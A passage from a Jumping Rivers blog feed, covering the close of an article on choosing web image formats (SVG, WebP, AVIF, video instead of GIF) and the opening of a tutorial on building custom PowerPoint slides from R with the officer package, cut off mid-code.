&lt;h2 id="using-vector-graphics"&gt;Using Vector Graphics&lt;/h2&gt;
&lt;p&gt;The solution that makes life easy&amp;hellip; when it&amp;rsquo;s applicable. Instead of using a PNG (or JPEG), use an SVG - a scalable vector graphic.&lt;/p&gt;
&lt;h3 id="advantages-of-svg"&gt;Advantages of SVG&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Instead of storing data about the colours of millions of pixels, these files store a set of instructions for constructing an image. This is usually the perfect solution for company logos and most common chart types because they can be scaled however you like precisely because they&amp;rsquo;re just a list of instructions. No need to serve multiple images.&lt;/li&gt;
&lt;li&gt;They can be added to the page in a number of ways, including using a simple &lt;code&gt;img&lt;/code&gt; tag.&lt;/li&gt;
&lt;li&gt;With a bit of JavaScript they can be made interactive and they&amp;rsquo;re easy to animate.&lt;/li&gt;
&lt;/ul&gt;
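&lt;p&gt;As a small illustration of the first two points, the sketch below shows one SVG file displayed at two sizes with plain &lt;code&gt;img&lt;/code&gt; tags. The file name logo.svg and the widths are hypothetical.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&amp;lt;!-- logo.svg is a hypothetical file; the same file serves both sizes --&amp;gt;
&amp;lt;img src=&amp;#34;logo.svg&amp;#34; width=&amp;#34;150&amp;#34; alt=&amp;#34;Company logo&amp;#34;&amp;gt;
&amp;lt;img src=&amp;#34;logo.svg&amp;#34; width=&amp;#34;600&amp;#34; alt=&amp;#34;Company logo&amp;#34;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;No &lt;em&gt;srcset&lt;/em&gt; is needed here because the browser redraws the image from its instructions at whatever size and pixel density is required.&lt;/p&gt;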
&lt;h3 id="shortcomings-of-svg"&gt;Shortcomings of SVG&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;They&amp;rsquo;re essentially useless for detailed images, like photography.&lt;/li&gt;
&lt;li&gt;Fonts may not be rendered properly when added through the &lt;em&gt;src&lt;/em&gt; attribute of an image tag if that font isn&amp;rsquo;t already on the user&amp;rsquo;s system. A work-around for this is to open a vector-image editor and find the option for rendering text as paths. While this will likely increase the file size a bit and cause minor imperfections in text rendering, it may be more problematic that this adds an extra step in the workflow when the SVGs are generated programmatically.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="illustrative-example"&gt;Illustrative example&lt;/h3&gt;
&lt;p&gt;Use the controls below to change between image formats and scaling to see the effect.
It should be apparent that when you scale up a PNG or JPEG the image becomes more blurred
and that the SVG, for the most part, remains crisp regardless of the scale-factor. (You may notice small artefacts with the SVG text when scaled up. These are seen because the characters are rendered using SVG paths rather than fonts, as described in the previous section.)&lt;/p&gt;
&lt;div id="rvc" class="img-demo"&gt;
&lt;label&gt;Select an image&lt;br&gt;&lt;select&gt;&lt;/select&gt;&lt;/label&gt;
&lt;label&gt;Scale factor&lt;br&gt;&lt;input type="number" min="1" value="1"/&gt;&lt;/label&gt;
&lt;span class="info"&gt;&lt;/span&gt;
&lt;div class="img-wrapper"&gt;
&lt;img alt="Litmus dashboard hex logo: a purple hexagon with charts in the background and the words 'Litmus Dashboard' written in the centre." /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2 id="using-new-image-formats"&gt;Using New Image Formats&lt;/h2&gt;
&lt;p&gt;Given the above, you may think the available image options for the web look something like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;JPEG (with lossy compression) for images with (up to) millions of colours;&lt;/li&gt;
&lt;li&gt;PNG for images with large consistent blocks of colours (like logos) or images that require transparency;&lt;/li&gt;
&lt;li&gt;SVG for vector graphics;&lt;/li&gt;
&lt;li&gt;GIF for your favourite animated meme.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But for images that can&amp;rsquo;t be easily represented in vector format there are several newer raster image formats: JPEG XL, WebP, AVIF and HEIC (A.K.A. HEIF) that offer better compression (lossy and lossless) than PNG, JPEG and GIF. Of these new formats, only WebP and AVIF have meaningful browser support, but that support is actually very good: currently &lt;a href="https://caniuse.com/?search=webp" rel="external"&gt;95.4% for WebP&lt;/a&gt; and &lt;a href="https://caniuse.com/?search=avif" rel="external"&gt;93.5% for AVIF&lt;/a&gt;. In fact, you may think support is good enough for both formats to not need to provide a fallback. However, if you want to, you can use the &lt;code&gt;picture&lt;/code&gt; and &lt;code&gt;source&lt;/code&gt; elements to cover even more browsers:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;picture&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;source&lt;/span&gt; srcset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;/images/home/whale-deep-dive-light-blue.webp 1x, /images/home/whale-deep-dive-light-blue@2x.webp 2x&amp;#34;&lt;/span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;image/webp&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;img&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;/images/home/whale-deep-dive-light-blue.png&amp;#34;&lt;/span&gt; alt&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#39; cartoon whale with Moon in background&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;picture&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the above example we use the &lt;em&gt;srcset&lt;/em&gt; attribute to provide two different sizes in the WebP format and the &lt;code&gt;img&lt;/code&gt; tag to provide a PNG fallback for older browsers (we assume users of older browsers aren&amp;rsquo;t using modern high-definition screens). The &lt;em&gt;alt&lt;/em&gt; text also still needs to be included in the &lt;code&gt;img&lt;/code&gt; tag rather than moved into the &lt;code&gt;source&lt;/code&gt; or &lt;code&gt;picture&lt;/code&gt; tags.&lt;/p&gt;
&lt;p&gt;When it comes to choosing between WebP and AVIF, WebP has marginally better browser support, but the consensus is that AVIF offers better compression. This is maybe not surprising since it&amp;rsquo;s a much newer format than WebP, which actually turns fifteen in 2025. The downside to that is that we have found support for AVIF in editing tools to be much lower than it is for WebP. That landscape is always changing, however. WebP has one other advantage over AVIF: it supports lossy images &lt;em&gt;with&lt;/em&gt; transparency so if you need small image sizes and transparency it&amp;rsquo;s the only format in town.&lt;/p&gt;
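&lt;p&gt;If you have both formats available, you don&amp;rsquo;t necessarily have to choose. The sketch below lists an AVIF source ahead of the WebP one, since browsers use the first &lt;code&gt;source&lt;/code&gt; whose &lt;em&gt;type&lt;/em&gt; they support and otherwise fall back to the &lt;code&gt;img&lt;/code&gt;. The .avif file is an assumption for illustration; it is not part of the earlier example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&amp;lt;picture&amp;gt;
  &amp;lt;!-- Hypothetical AVIF version: tried first because it is listed first --&amp;gt;
  &amp;lt;source srcset=&amp;#34;/images/home/whale-deep-dive-light-blue.avif&amp;#34; type=&amp;#34;image/avif&amp;#34;&amp;gt;
  &amp;lt;!-- WebP for browsers without AVIF support --&amp;gt;
  &amp;lt;source srcset=&amp;#34;/images/home/whale-deep-dive-light-blue.webp&amp;#34; type=&amp;#34;image/webp&amp;#34;&amp;gt;
  &amp;lt;!-- PNG fallback; the alt text stays on the img element --&amp;gt;
  &amp;lt;img src=&amp;#34;/images/home/whale-deep-dive-light-blue.png&amp;#34; alt=&amp;#34;Jumping Rivers&amp;#39; cartoon whale with Moon in background&amp;#34;&amp;gt;
&amp;lt;/picture&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;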
&lt;p&gt;Both WebP and AVIF support image animation but, as you will see in the next section, there&amp;rsquo;s another alternative for replacing our old friend the GIF.&lt;/p&gt;
&lt;p&gt;The example below shows a 300-pixel-wide image of &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;The Catalyst&lt;/a&gt; building in Newcastle, where Jumping Rivers is headquartered. You can choose between viewing a lossless PNG, lossless WebP, lossy JPEG, and a lossy WebP image. The two lossless formats should look the same, but the WebP image is about 20% smaller in file size than the PNG. The lossy images both have &amp;ldquo;medium&amp;rdquo; levels of compression so should be of roughly comparable quality, but not identical (since they use different compression algorithms). The lossy WebP image is only about one third the file size of the JPEG!&lt;/p&gt;
&lt;div id="fmt" class="img-demo"&gt;
&lt;label&gt;Select an image&lt;br&gt;&lt;select&gt;&lt;/select&gt;&lt;/label&gt;
&lt;label&gt;Scale factor&lt;br&gt;&lt;input type="number" min="1" value="1"/&gt;&lt;/label&gt;
&lt;span class="info"&gt;&lt;/span&gt;
&lt;div class="img-wrapper"&gt;
&lt;img alt="Photo of The Catalyst building in Newcastle" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2 id="using-videos-instead-of-gifs"&gt;Using Videos Instead of GIFs&lt;/h2&gt;
&lt;p&gt;GIFs, particularly animated GIFs, have been a big part of internet culture. However, they are a very old format with large file sizes and poor &lt;a href="https://en.wikipedia.org/wiki/Gamut#:~:text=In%20color%20reproduction%20and%20colorimetry,e.g.%20camera%20or%20visual%20system" rel="external"&gt;colour gamuts&lt;/a&gt;: they are limited to a maximum of just 256 different pixel colours. All modern browsers support video natively through the &lt;code&gt;video&lt;/code&gt; element, and video formats offer much better compression and huge colour palettes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;video&lt;/span&gt; src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;assets/hex-dissolve.mp4&amp;#34;&lt;/span&gt; aria-label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Litmusverse hex sticker animation&amp;#34;&lt;/span&gt; autoplay&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt; loop&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt; muted&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;&amp;gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;video&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;em&gt;aria-label&lt;/em&gt; attribute is used like the &lt;em&gt;alt&lt;/em&gt; text of an &lt;code&gt;img&lt;/code&gt; element. The other attributes should be fairly self-explanatory: &lt;em&gt;autoplay&lt;/em&gt; tells the browser to play the video automatically, &lt;em&gt;loop&lt;/em&gt; to loop the video around back to the start when it finishes and &lt;em&gt;muted&lt;/em&gt; not to play any sound. The last of these is required because, thankfully, browsers will no longer autoplay videos with sound.&lt;/p&gt;
&lt;div class="video-wrapper"&gt;
&lt;video src="assets/hex-dissolve.mp4" aria-label="Litmusverse hex sticker animation" autoplay="true" loop="true" muted="true"&gt;&lt;/video&gt;
&lt;/div&gt;
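&lt;p&gt;A slightly fuller variant is sketched below, under a couple of assumptions. It writes the boolean attributes without values (their presence alone switches them on), adds &lt;em&gt;playsinline&lt;/em&gt;, which asks mobile browsers such as Safari on iOS to play the video in place rather than full screen, and uses &lt;code&gt;source&lt;/code&gt; elements to offer more than one encoding. The .webm file is hypothetical and is not part of the example above.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&amp;lt;video aria-label=&amp;#34;Litmusverse hex sticker animation&amp;#34; autoplay loop muted playsinline&amp;gt;
  &amp;lt;!-- Hypothetical WebM encoding: used by browsers that can play it --&amp;gt;
  &amp;lt;source src=&amp;#34;assets/hex-dissolve.webm&amp;#34; type=&amp;#34;video/webm&amp;#34;&amp;gt;
  &amp;lt;!-- MP4 fallback, as in the example above --&amp;gt;
  &amp;lt;source src=&amp;#34;assets/hex-dissolve.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;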
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rethinking-image-formats/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Custom PowerPoints Using {officer}</title><link>https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/</link><pubDate>Thu, 22 May 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;From a purely design perspective, Quarto’s standard PowerPoint output
falls short. It is limited to
&lt;a href="https://quarto.org/docs/presentations/powerpoint.html" rel="external"&gt;seven&lt;/a&gt; layout
options, with the most complex being “Two Content.” The &lt;code&gt;{officer}&lt;/code&gt; R
package offers a powerful alternative for those seeking full control and
customisation.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-custom-powerpoints-using-officer"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="why-powerpoint"&gt;Why PowerPoint?&lt;/h2&gt;
&lt;p&gt;At work, I use a Linux operating system (OS), and at home, I use macOS.
Within my little bubble, it’s easy to forget how much of the market
share Microsoft still holds. It’s &lt;a href="https://gs.statcounter.com/os-market-share/desktop/worldwide/#monthly-202502-202502-bar" rel="external"&gt;estimated that around 70% of the
desktop operating system market share belongs to
Microsoft&lt;/a&gt;.
Many of the clients I work with prefer Microsoft outputs, such as
PowerPoint, over HTML or PDF. Aside from company alignment with
Microsoft, there are a few practical reasons why using PowerPoint with
Quarto can be advantageous:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;No need to be a CSS / LaTeX whizz-kid to produce professional-looking
slides&lt;/li&gt;
&lt;li&gt;Possible (and easy) to edit &lt;em&gt;after&lt;/em&gt; rendering the doc!&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-is-officer"&gt;What is {officer}?&lt;/h2&gt;
&lt;p&gt;From
&lt;a href="https://davidgohel.github.io/officer/" rel="external"&gt;davidgohel.github.io/officer&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The officer package lets R users manipulate Word (.docx) and
PowerPoint (*.pptx) documents. In short, one can add images, tables
and text into documents from R. An initial document can be provided;
contents, styles and properties of the original document will then be
available.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This means that, for this workflow, Quarto is sidestepped altogether, and we
focus entirely on R scripts and R coding.&lt;/p&gt;
&lt;h2 id="how"&gt;How?&lt;/h2&gt;
&lt;p&gt;There are a few ways to use {officer} - I’ll walk through the approach
that I’ve found to be most effective.&lt;/p&gt;
&lt;h3 id="layout-templates"&gt;Layout templates&lt;/h3&gt;
&lt;p&gt;First - you’ll need a PowerPoint presentation that contains template
layout slides. There are no limits to these slides: the format can be as
custom as you like and there can be as many layouts as you want.
Remember - this file doesn’t need any actual slides, it only needs
layouts! To create a layout:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Enter “Slide Master” mode&lt;/li&gt;
&lt;li&gt;Add any content (headers, footers, styling etc) you want to appear
on each slide to the “Slide Master”&lt;/li&gt;
&lt;li&gt;Create a new Layout Slide&lt;/li&gt;
&lt;/ol&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/slide_master.png" alt="Slide Master view in PowerPoint." style="display: block; margin: auto;" /&gt;
&lt;p&gt;To insert content from R, the easiest way is via placeholders. These can
be text, tables, images and more. To add a placeholder:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Click “Insert Placeholder” and choose the content type&lt;/li&gt;
&lt;li&gt;If it’s a text placeholder, you can customise the formatting of the
text&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;You can see below that I’ve added some basic Jumping Rivers styling to
mine, and added two placeholders: a text placeholder for a title and an
image placeholder for a plot.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/ready_to_add.png" alt="Layout slide in PowerPoint with Jumping Rivers styling, a text placeholder for a title and an image placeholder for a plot." style="display: block; margin: auto;" /&gt;
&lt;p&gt;In order to access these placeholders easily from R, it’s better to
rename them:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Home tab&lt;/li&gt;
&lt;li&gt;Click the “Select” dropdown&lt;/li&gt;
&lt;li&gt;Click “Selection pane”&lt;/li&gt;
&lt;li&gt;Select your placeholder and rename&lt;/li&gt;
&lt;/ol&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/selection_pane.png" alt="Changing your placeholder names via the selection pane in PowerPoint." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Here I’ve named my image placeholder &lt;em&gt;“plot”&lt;/em&gt;, and my text placeholder
for the slide title, &lt;em&gt;“title”&lt;/em&gt;. Note that it’s also a good idea to name
your layout - just right click and hit rename. In this demo I’ve just
left it as &lt;em&gt;“Title Slide”&lt;/em&gt;.&lt;/p&gt;
&lt;h3 id="the-r-code"&gt;The R code&lt;/h3&gt;
&lt;p&gt;Now that I’ve got my template set up, the rest is in R. First, we load
{officer} and read the PowerPoint document in as an R object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;officer&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_pptx&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mytemplate.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you’ve forgotten your layout / placeholder names, access them through
&lt;code&gt;layout_summary()&lt;/code&gt; and &lt;code&gt;layout_properties()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_summary&lt;/span&gt;(doc)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_properties&lt;/span&gt;(doc, layout &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Title Slide&amp;#34;&lt;/span&gt;, master &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Office Theme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/document_properties.png" alt="Document properties for an officer document object." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Before any content can be added, content is needed! Let’s use the
{palmerpenguins} package to create a simple plot of the “Adelie” penguin
data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;palmerpenguins&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;adelie_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(species &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Adelie&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bill_length_mm, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flipper_length_mm)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_linedraw&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Make the background transparent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;transparent&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Match the panel colour to the slide&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#F1EADE&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bill Length (mm)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Flipper Length (mm)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I can add empty slides to the document using the &lt;code&gt;add_slide()&lt;/code&gt; function.
Here I simply choose a layout from my &lt;code&gt;.pptx&lt;/code&gt; file to use.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_slide&lt;/span&gt;(doc, layout &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Title Slide&amp;#34;&lt;/span&gt;, master &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Office Theme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then, using the &lt;code&gt;ph_with()&lt;/code&gt; function, I can insert R objects into my
placeholders by name:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Adelie&amp;#34;&lt;/span&gt;,
